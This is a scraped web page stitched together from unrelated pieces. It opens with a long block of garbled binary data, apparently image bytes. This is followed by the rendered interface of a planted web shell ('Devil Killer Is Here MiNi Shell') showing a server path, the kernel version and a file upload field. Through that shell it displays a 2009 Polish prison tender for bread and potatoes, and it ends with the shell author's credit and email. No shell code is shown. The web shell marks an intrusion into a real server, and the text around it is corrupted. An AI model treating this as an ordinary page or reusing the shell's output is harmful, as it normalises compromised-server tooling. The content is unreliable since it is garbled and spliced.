JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/94608-N-2009.html

<p class="kh_header"><b>Biała Podlaska: Przetargu nieograniczonego o wartości zamówienia mniejszej niż kwota określona w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych</b><br>
<b>Numer ogłoszenia: 94608 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Prosta 33, 21-500 Biała Podlaska, woj. lubelskie, tel. 083 3447509, faks 083 3432198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetargu nieograniczonego o wartości zamówienia mniejszej niż kwota określona w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Chleb baltonowski (pieczywo mieszane), zgodnie z kodem CPV 15811100-7 wg PN-84/A-74103, skład: (mąka pszenna typ 750, mąka żytnia typ 720, drożdże, sól biała, olej jadalny), krojony, pakowany po 200 gram +/- 5% , w folię z tworzywa sztucznego lub innych odpowiednich materiałów dopuszczonych do pakowania środków spożywczych, gat I - 5 6000,00 kg.
Chleb baltonowski (pieczywo mieszane) - powinno być znakowane zgodnie z przepisami obowiązującymi w zakresie znakowania artykułów opakowanych a co najmniej zawierać:
-	nazwę i adres producenta
-	rodzaj chleba
-	masę jednostkową
-     datę produkcji lub termin przydatności do spożycia   

2.	Bułka tarta, zgodnie z kodem CPV 15890000-3 gat. I - 120,00 kg.


3.	Pączki zgodnie z kodem CPV 15812200-5 - gramatura 50 gram +/-10% szt. produkowany na podmłodzie drożdżowej z mąki pszennej wrocławskiej typ 500 z dodatkiem surowców i dodatków produkcyjnych określonych recepturą tj: cukier kryształ do ciasta, jaja lub proszek jajowy do ciasta, margaryna mleczna, aromaty do ciast, cukier waniliowy, marmolada bądź dżem do nadziewania, pomada do cukrowania (cukier puder), olej jadalny do smażenia, gat. I - 380,00 szt.


4.	Bułka słodka z kruszonką zgodnie z kodem CPV 15812200-5 - produkowany na podmłodzie drożdżowej z mąki pszennej wrocławskiej typ 500 z dodatkiem drożdży do fermentacji z użyciem wymienionych dodatków do ciasta tj: cukier kryształ, jaja lub proszek jajowy, margaryna mleczna, aromaty do ciast, kruszonka lub cukier puder na podsypkę, gat. I - 30,00 kg.

Część 2:

1.	Ziemniak jadalny			 Gat. I	-       2 5000,00 kg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 03.21.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wszyscy wykonawcy, którzy spełniają warunki zawarte w  art. 22 ust. 1 oraz art. 24 ust 1, 2.- Ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia zgodnie ze wzorem określonym w załączniku nr 2 do SIWZ.
 Oświadczenie Wykonawcy o spełnieniu warunków określonych w Ustawie z dnia 25 sierpnia 2006r o bezpieczeństwie żywności i żywienia, zgodnie ze wzorem określonym w załączniku nr 3 do SIWZ.
  Formularz ofertowy, zgodnie ze wzorem określonym w załączniku nr 4 do SIWZ.
 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych przez Wykonawcę za zgodnością z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać nieodpłatnie: osobiście w siedzibie zamawiającego ul. Prosta 33, 21-500 Biała Podlaska, budynek F pokoju nr 103, w godzinach 7.30-15,00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 10:00, miejsce: Oferty należy składać w sekretariacie ( budynek A, pok. Nr.205) Zakładu Karnego w Białej Podlaskiej ul. Prosta 33, 21-500  Biała Podlaska do dnia 16 kwietnia 2009r.do  godziny 10.00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakład Karny Biała Podlaska
ul. Prosta 33
21-500 Biała Podlaska,
tel. 343-67-44 do 45  fax 343-21-98.
REGON 000320905, NIP 537-10-46-157.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb baltonowski (pieczywo mieszane), zgodnie z kodem CPV 15811100-7 wg PN-84/A-74103, skład: (mąka pszenna typ 750, mąka żytnia typ 720, drożdże, sól biała, olej jadalny), krojony, pakowany po 200 gram +/- 5% , w folię z tworzywa sztucznego lub innych odpowiednich materiałów dopuszczonych do pakowania środków spożywczych, gat I - 5 6000,00 kg.
Chleb baltonowski (pieczywo mieszane) - powinno być znakowane zgodnie z przepisami obowiązującymi w zakresie znakowania artykułów opakowanych a co najmniej zawierać:
-	nazwę i adres producenta
-	rodzaj chleba
-	masę jednostkową
-     datę produkcji lub termin przydatności do spożycia   

2.	Bułka tarta, zgodnie z kodem CPV 15890000-3 gat. I - 120,00 kg.


3.	Pączki zgodnie z kodem CPV 15812200-5 - gramatura 50 gram +/-10% szt. produkowany na podmłodzie drożdżowej z mąki pszennej wrocławskiej typ 500 z dodatkiem surowców i dodatków produkcyjnych określonych recepturą tj: cukier kryształ do ciasta, jaja lub proszek jajowy do ciasta, margaryna mleczna, aromaty do ciast, cukier waniliowy, marmolada bądź dżem do nadziewania, pomada do cukrowania (cukier puder), olej jadalny do smażenia, gat. I - 380,00 szt.


4.	Bułka słodka z kruszonką zgodnie z kodem CPV 15812200-5 - produkowany na podmłodzie drożdżowej z mąki pszennej wrocławskiej typ 500 z dodatkiem drożdży do fermentacji z użyciem wymienionych dodatków do ciasta tj: cukier kryształ, jaja lub proszek jajowy, margaryna mleczna, aromaty do ciast, kruszonka lub cukier puder na podsypkę, gat. I - 30,00 kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakład Karny Biała Podlaska
ul. Prosta 33
21-500 Biała Podlaska,
tel. 343-67-44 do 45  fax 343-21-98.
REGON 000320905, NIP 537-10-46-157.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniak jadalny				Gat. I	-    2 5000,00 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com